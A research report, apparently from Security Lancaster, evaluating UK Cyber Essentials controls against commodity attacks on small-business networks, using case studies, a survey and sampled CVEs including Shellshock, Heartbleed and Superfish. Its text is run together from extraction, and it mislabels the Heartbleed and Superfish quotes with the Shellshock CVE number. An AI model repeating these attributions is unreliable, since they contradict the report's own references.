The rsquo10 Steps to Cyber Securityrsquo reportpublished by CESG[2] highlights that inorder to maximise the security of a networkit is essential to not only consider theprevention of attacks with the use of toolsbut to also ensure that all employees areadequately educated in network securityand treated with scrutiny through accesslogs and data-loss-prevention schemes inorder to achieve a secure business in the faceof potential local and remote attacks Wewould recommend that especially for largerorganisations additional security measuressuch as these be put in place
For hardware or software identified as
inherently flawed resulting in unmitigatablevulnerabilities our recommendation is thatthese pieces of software or hardware beavoided at all costs when developing an SMEnetwork In addition a global list of un-safe products could be collectively developedand made publicly available This relates toour last recommendation of integrating CyberEssentials further with collective securityapproaches such as The Cyber-securityInformation Sharing Partnership (CiSP)[4]These approaches keep SMEs with the latestinformation about vulnerabilities and othercyber-threat information
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 2 of 28
IntroductionC
yber Essentials was introduced asa government funded scheme firstpublished in April 2014 as an interest
of national security to bolster UK securityin cyberspace The Cyber Essentialsscheme was developed in collaboration withthe Information Assurance for Small andMedium Enterprises (IASME) consortiumthe Information Security Forum (ISF) andthe British Standards Institution (BSI) as aset of basic technical security controls fororganisations to utilize for the mitigation ofthe lsquobottom 80rsquo of remote cyber-threats[3]
The scheme built to provide animplementable of the 10-steps to Cyber-Security[1] was released as part of the2011 UK Cyber Security Strategy[16] andis being backed by the UK government asan organisational standard Thus far it hasbeen adopted by several large organisationsincluding Vodafone Hewlett-Packard (HP)BAE Systems Virgin Media and Barclays[5]
The Cyber Essentials accreditation hasbeen made mandatory from October 1st
2014 for all suppliers of government contractsinvolving ldquothe handling of sensitive andpersonal information and provision of certaintechnical products and servicesrdquo[17]
The Cyber Essentials security controls aresummarised as follows[7]
Firewalls and GatewaysThese are devices designed to preventunauthorised access to or from privatenetworks but good setup of thesedevices either in hardware or softwareform is important for them to be fullyeffective
Secure configurationEnsuring that systems are configured inthe most secure way for the needs ofthe organisation
Access controlEnsuring only those who should haveaccess to systems to have access and atthe appropriate level
Malware protectionEnsuring that virus and malwareprotection is installed and is it up todate
Patch managementEnsuring the latest supported version ofapplications is used and all the necessarypatches supplied by the vendor beenapplied
Figure 2 Cyber Essentials Security Tools
The intended scope of Cyber Essentialsis outlined in the Cyber Essentials SchemeAssurance Framework[10] This states thatthe CE controls are considered as applicableto all sizes of Enterprise as a base level ofprotection against cyber-attacks upon whichindividual organisations may build on withfurther tools network devices or protocols forthe mitigation of targeted attacks The CEScheme is clear in its inclusion of lsquoBring your
own Devicersquo network setups to scope as wellas Cloud-based services and off-the-shelf webapplications Bespoke IT systems such as inmanufacturing and retail are applicable to CEbut hold additional vulnerabilities due to theirnature that are not to be considered
Aims
The purpose of this report is to investigatethe effectiveness of the Cyber Essentialscontrols in mitigating lsquocommodity-levelrsquoattacks attempting to exploit vulnerabilitiesin Small and Medium Enterprise (SME)networks
A commodity-level attack has been definedby CESG[8] as
Any unauthenticated remote attackexploiting a known vulnerability withthe use of tools and techniques openlyavailable for download or purchaseon the internet - and that do notrequire extensive specialist knowledge toconduct1
To effectively assess Cyber Essentials itis firstly necessary to understand the typicalnetwork configurations of SMEs Interviewswith SMEs were carried out to build abstractednetwork models and a survey has beenconducted to build a broader picture of SMEnetwork deployments The survey resultswill help to develop our understanding ofcurrent security practice and cyber-awarenessas well as to build a general-case SME networkwith which to analyse the typicality of SMEsinterviewed
The networks modelled from collected dataare to be considered with and without the useof the Cyber Essentials security controls tocomparatively establish the protection grantedwith the adoption of the CE scheme
1This includes attacks utilising pen-testing software such as Metasploit Kali and the Poison Ivy remote access tool which are capable of scanning network nodes for publiclyknown vulnerabilities in the operating system applications or services in use
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 3 of 28
MethodologyT
he scheme of work for this report has beensplit into the following sections
bull Collection of data through interviews anda survey regarding the implementationand deployment of networks in real-worldSMEs for use in designing paper-modelsto be analysed
bull Composition of a list of suitablevulnerabilities that contains applicablemethods by which remote attackers canexploit commodity-level attacks
bull Assessment of vulnerability mitigation forSME networks with and without the useof the CE Tools
Data Collection
In order to analyse the effectiveness of theCyber Essentials Security Tools four real-world SME networks have been modelledModels have been composed using informationgathered in interviews and abstracted toreduce redundant complexity and removeany linkage with the SME In addition ageneralisable SME model was composed fromSurvey responses to serve as a baselinenetwork from which all SME networks maybe adapted
Interviews
The interviews were composed with the goalof firstly understanding the layout or topologyof the network deployed by an SME To thenbuild on the network configuration it wasimportant to understand how the network isused - where remote connections take placehow local services are utilised and how anattacker sees the network Hardware vendorsoperating systems and version numbers wereconsidered to build a greater understanding ofthe network
Additional questions were posed toexamine the current state of security on thenetwork such as any security accreditationsprevious breaches and how often updates arerolled out
Survey
The Survey was constructed as a stripped-down questionnaire representing the essenceof the questions posed in the Interviews Thisincluded details of the number of workstationsat the SME to gauge its size the localand remote services available the operatingsystems used on the service providers andworkstations the current security policies in
place and the respondentsrsquo awareness of theCE Scheme
Two surveys were sent out one to a securelist of SMEs in the NW Security Cluster[9]and another publicly to closed groups ofsecurity-interested SME representatives
Vulnerabilities
A total of 200 random vulnerabilitieshave been equally taken from two annualvulnerability lists of CVE-2013 and CVE-2014 published by Mitre2 Any vulnerabilitiesfound to be unsuitable for analysis have beenreplaced by a new candidate
In this report we use the Mitreorganisation definition for a vulnerabilitywhich they state as
An information securityldquovulnerabilityrdquo is a mistake in softwarethat can be directly used by ahacker to gain access to a system ornetwork CVE considers a mistake avulnerability if it allows an attackerto use it to violate a reasonablesecurity policy for that system (thisexcludes entirely ldquoopenrdquo security
2CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security
Figure 3 Methodology for Assessing Cyber Essentials
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 4 of 28
policies in which all users are trustedor where there is no consideration ofrisk to the system)
(As shown on Mitreorgrsquos Terminologypage[6] in March rsquo15)
To warrant a CVE entry into the Mitrelist individual vulnerabilities must place theaffected system (or systems) in to a statewhich either
bull allows an attacker to executecommands as another user
bull allows an attacker to access data that iscontrary to the specified access restrictionsfor that data
bull allows an attacker to pose as anotherentity
bull allows an attacker to conduct a denialof service
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities werealso taken in addition to the randomly chosen200 and have been assessed to what extentthe Cyber Essentials scheme would affect thevulnerability of SMEs in these situations
Additionally the applicability of thesevulnerabilities to the SME networks we studiedis included along with the respective potentialto harm operations
Mitigation Assessment
The Vulnerabilities chosen have beenqualitatively assessed for mitigation withand without the use of the Cyber Essentialscontrols The process considers each
component of the controls in asserting whethereach vulnerability would be mitigated partiallymitigated or not mitigated The results aredouble-vetted to ensure correctness
For each of the SMEs Interviewed each ofthe vulnerabilities are assessed for applicabilityto that network configuration In cases wherethe vulnerability is for a specific model ofhardware the network is deemed applicable ifit uses a like-product from the same vendorIn cases where the vulnerability is in softwareonly those referencing software in-use or likelyin-use (based on the SMErsquos practice) aredeemed applicable to the network
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 5 of 28
AnalysisT
he analysis of data collected has beensplit into sections firstly each of thevulnerabilities have been assessed to
ascertain their mitigation with and withoutthe use of the Cyber Essentials controlsthis supposes a case where any software orhardware source of a vulnerability is in use (iea worst-case fully inclusive assessment)
What follows is an analysis into theinformation gathered from interviews FourSMEs from distinct industries are detailed inphysical infrastructure and service usage aswell as current user access policies and existingsecurity measures in place A summary of themitigation results in vulnerabilities in softwareand hardware used for each SME networkconfiguration is included
The full table for the applicability of allCVE vulnerabilities to each of the networkstructures can be found in the CVE Detailssection on page 19
Finally the data collected from the surveyis analysed and used to develop a general-case network model the SME networks arecompared to this to better understand thenuances of each market sector as well theoverall typical configuration of SMEs
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from2013 and 2014 deemed as applicable tothe study and chosen for analysis 131vulnerabilities were mitigated with the useof the Cyber Essentials Security Tools 61vulnerabilities were partially mitigated and 8were not mitigated
Figure 4 Percentage of Full Vulnerabilities ListMitigated
Partially Mitigated 59 of the 61 CVEsjudged as partially mitigated are as suchbecause they rely of patches from third-party software or hardware vendors butthat will be mitigated once a security fixhas been released Despite any level ofsecurity tools being deployed on a network thesecurity involved in using third party softwareunfortunately relies on the vendorrsquos ability toidentify potential areas of risk as well asto quickly respond to security breaches as
they become apparent with the release ofpatches All software installed on an SMEnetwork should be periodically reviewed todecide whether it is necessary - or if thereare more suitable and potentially more securesolutions available
The other two partially mitigatedvulnerabilities rely on website blacklistingcombined with avoiding vulnerable webbrowser software A secure configurationwithout such a browser would mitigate thisvulnerability but as in the Web DevelopmentSME case study it may not always be possibleto avoid the use of a specific software pieceIn a case as this website blacklisting is theonly defence against the vulnerabilities
Not Mitigated - Secure ConfigurationSome vulnerabilities have been found to beunmitigatable using the CE controls in each ofthe found cases this is due to inherent flaws ina hardware device or software that can not befixed by a security patch or firmware update
For these devices that are fundamentallyflawed from a cyber-security stand-point itcan be that no level of security tools on top ofthe network can aid in mitigation - rather thehardware should be replaced to ensure networksecurity It may be possible for a public list ofall such devices to be developed as part of thegovernment cyber-security scheme - to serveas a device-blacklist for SMEs
Case Studies
Four SMEs were interviewed to build paper-models upon which the Cyber Essentialscontrols may be assessed Some detail on thephysical structure usage and existing securityof each network is provided
bull SME Network One represents a financespecialist SME using a combination ofexternally managed services for bankingin addition to internal remotely accessibleinternal services for employees
bull SME Network Two represents a specialistSME utilizing an off-site remotely managedserver for administrator services and cloud-based services for employees
bull SME Network Three represents a webservices SME that accesses client serversfrequently and utilises cloud-basedservices daily
bull SME Network Four represents a hospitalityservices provider with a very smallcompany network co-located with a verylarge guest network component where allof the services are remotely managed andlocated
SME Network One - Finance Sector
Physical Infrastructure The companyinterviewed comprised around 20 employeeslocated at 3 sites nationally
Remote workers connect over normalinternet connections both residential andcommercial and use both VPN and non-VPNtraffic (specifically web traffic on port 80) toaccess services supplied by the company
Figure 5 SME-1 Network
The hardware at the head office (wherethe interview was carried out) consists ofequipment by 3Com Draytek BT and Heuwaifor infrastructure components Employees usea range of machines bought between 2011and 2014 comprising a mix of Dell and LenovoPCs
As most of the infrastructure is passive(most of the traffic is handled by a single3Com BaseT-1000 switch) the firmware onthe equipment is unchanged from purchase ifany firmware is present at all
Services At the head office site a WindowsFile Server (SAMBA) server provides local filesharing and allows remote users to accessthe same files via VPN The mail servera Microsoft Exchange Server is an off-sitedeployment managed by an external companybut is a dedicated server for only this company
Additionally a web service and databaseserver is run from a server at the site Thisprovides both local HTTP access to thedatabase it runs as well as having firewallrules put in place to allow external access tothe same system for off-site employees
Numerous other pieces of banking softwareare run on bank-owned remote servers andare accessed and secured via combinationsof smart cards and PIN entry devices alsosupplied by the banks
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 6 of 28
User Access Employees are permitted toaccess the internet from both their individualworkstations and additional devices such assmart phones (although technically this is notpermitted by policy but this policy is notstrictly enforced) Internet access is howeverslightly filtered with access to Facebook beingblocked by the router
Access logs for any network operations arenot created and any machine in the office canaccess the network with no isolated islands
User accounts can be migrated betweenmachines via a Domain Controller but inpractice this is unlikely to actually happenwith users generally using their own machines
Operating systems Locally everything isWindows 7 the remote site uses Windows7 2 remote machines are Windows 81
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 119 wereapplicable to the first SME network
Figure 6 SME-1 Vulnerability Mitigation
Because much of this SMEs operationsare done via browser-based interfaces to otherfinancial companies (such as banks) it placesthem in the firing line for a large number ofthe browser based attacks Furthermore assome banks require specific browser versionsfor their interfaces to work they end upwith several different browsers with severalversions of each to cover all their requirementsopening them up multiple times to browser-based vectors
Additionally the heavy use of SSL-basedcommunication places them in a positionwhere any SSL vulnerabilities affect them too
SME Network Two - Specialist Group
Physical Infrastructure The second SMEparticipant employs 20-25 based acrossmultiple offices in one building
Employees may bring their own devices oruse a workstation provided Workstations areconnected to one of four switches via Ethernetand share a virtual LAN with other employeedevices An off-site server containing sensitivedata is accessible only to administrators viaSSH
Network Equipment includes an externalDell PowerEdge Server four TPLink SwitchAccess Points and a TPLink DHCP Router
Figure 7 SME-2 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows XP Windows 7 amp Windows 8 withauto-updates enabled
Some Employee use of VPN to connectto another network for a data service Allother services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and may use theirown equipment Administrators often accessa remote server database and file store actingas a web server Guests may access a separateWi-Fi network through the same access pointsas other office workers but do not sharethe same virtual LAN as employees Wi-Fiaccess logs are gathered but no other useractivity Employees can access the networkfrom any machine but the SMErsquos policy isthat all machines should have anti-malwareand strong passwords which are recommendedto be changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilitiesOf the 200 listed vulnerabilities 79 wereapplicable to the second SME network
Figure 8 SME-2 Vulnerability Mitigation
The specialist SME had the fewest overallpotential vulnerabilities largely owed toa higher reliance on cloud-based servicesAlthough this reduces the risk from inherentvulnerability in a network responsibility ishanded onto the service provider chosen Acertified and reputable cloud services providershould thus be sought to ensure protectionthrough the entire chain
SME Network Three - Web Development
Physical Infrastructure SME-3 employs 10workers based in one building
Employees are restricted from using theirown devices unless it is validated by thecompany head - in which case no others mayshare that device Workstations are connectedto one switch via Ethernet and share a virtualLAN with other employee devices
Network Equipment includes an externalDell PowerEdge Server one TPLink SwitchAccess Point and a TPLink DHCP Router
Figure 9 SME-3 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows 7 amp Windows 8 with auto-updatesenabled
All services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and commonly useall major browsers for compatibility testing
Guests are not permitted on the networkbut may join a rsquoguestrsquo network through thesame access points with a mobile device Wi-Fi logs and Cloud Service Access logs aregathered and actively monitored Employeescan access the network from a validatedmachine but the SMErsquos policy is thatall machines should have anti-malware and
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 7 of 28
strong passwords which are recommended tobe changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 116 wereapplicable to the second SME network
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web developmentSMEs to operate across multiple web browserson various versions to test and build acustomerrsquos website means that the networkaccumulates all vulnerabilities in web browsersAs this is a specialist case a recommendationfor web development organisations could beto use one up-to-date browser for general useA bespoke policy may then be put in place
When working on alternative browsersemployees should only access client pageswhere the developer has control of the web-content
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure This company islocated at a single site and has equipmentcomposed of a single desktop PC and 2company laptops running on a ADSL router -this same router also provides the internetconnection for the guests An alternativerouter is available as a manual fall-backconnection to the internet but is availableonly to company equipment
The guest network is split from the officenetwork through secondary access point namesfiltering traffic in to a separate VLAN internalto the router
Services No local servers are present toprovide any service to employees or guestson the network
File storage is provided through on-lineservices including Dropbox and Skydrive Astandalone web-server owned and managedexternally runs the company website andbookings are managed via a globally accessiblewebsite
All the services are accessed with SSLsecured connections (HTTPS mainly)
User Access User access is not mediated inany way and any site can be accessed fromany computer Guests have no restrictionsplaced on their network usage either
Operating systems The company uses iOSfor their mobile devices and Windows 81 forthe office desktop and laptop PCs Guests canbring their own equipment so will be a mixof all operating systems currently availableincluding Windows Linux Mac and others
Existing Security Measures Beyond therouterrsquos separation between the guest andoffice networks no other network securitymeasures are in place The office PCs dohave automatic patch installation configuredhowever and have the Kaspersky antivirussuite installed
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 103 wereapplicable to the second SME network
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1 SME 4 requires theuse of web browsers for bookings and receptionof guests so enables a wide variety of attackvectors through the web
Thankfully the services and servers theyconnect to are run by larger corporationswhich will hopefully have implemented at leastCyber Essentials-grade security and protectionso the actual risks should be minimal
For the purposes of this report howeverwe assume that if this company has notimplemented Cyber Essentials then theservices they use must also not have leavingthem open to attack
Survey Responses
Data gathered from survey responses affordsa much broader look at the typical networkdeployments and practice in SMEs The fullresults from 17 participants may be found inthe Survey Responses section on page 27
Physical Infrastructure The majority ofrespondents belong to SMEs with 0-9workstations on site this is related to the sizeof an organisation - and could be consideredrepresentative of businesses across the UK
Services Local - File Email Database andDomain Servers are the most common localservice providers all present in more than 13rdof SMEs Remote - Email web hosting andfile-sharing are the most common servicesprovided remotely
User Access More than half of SMEs permitemployeersquos own devices to be used in theworkplace for organisations such as these it isimportant to ensure that employee machinesreceive the same level of protection as therest of the work network - as one vulnerablemachine allows vulnerability into the wholecompany
Existing Security Measures Of the surveyrespondents most SMEs have a firewallpassword policy and data-loss preventionscheme in place These are the mostcommon security measures in place forthe SMEs contacted below this is accesscontrol malware protection and finally patchmanagement which is present in a little overhalf of organisations
Almost two-thirds of survey participantswere previously aware of Cyber Essentials
Survey Respondents Network
The network built from Survey Respondentsdata considers the overall response in order tobuild a network easily adaptable to match thatof the majority of SME network configurations
Locally Email and File servers havebeen represented with domain controllercapabilities represented in a network ADSLRouter Remotely a web server is depictedbut remote services may also include databaseusage email and other web services
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 8 of 28
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents networkaspects of each of the interviewed SMEnetworks is apparent
The Finance SME network shares a localfile server as sensitive information needs tobe kept and processed by the organisationAny SME handling sensitive information willbe likely to strongly consider using local fileservers
The Specialist SME shares with the surveyrespondents data itrsquos use of SSH to connectremotely to services SSH is an important toolfor accessing sensitive date while at home or
data that is stored remotely the workplace
The Web Development SME requiresemployees to connect to many web serversremotely the survey respondents match thiscase with the use of external web-hostingservices That being said in the general-casethis server is more likely to be the SMErsquos ownweb-hosting solution rather than a clients
The Hotel Services SME represents avery basic local network using only cloud-based services remotely This is becoming anincreasingly popular trend for SMEs as cloud-services are often easier to set up and cheaperto maintain This is also representative ofmany SMEs with little-to-no online presence
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 9 of 28
Analysis of CyberEssentials on High ProfileVulnerabilitiesT
he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015
These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected
With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack
The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised
ldquoHeartbleedrdquo
Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget
As described in the original CVE report
The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug
CVE-2014-6271[12]
As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack
Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments
Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses
or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects
It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect
ldquoSuperfishrdquo
The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products
CVE-2014-6271[14]
This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment
The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 10 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
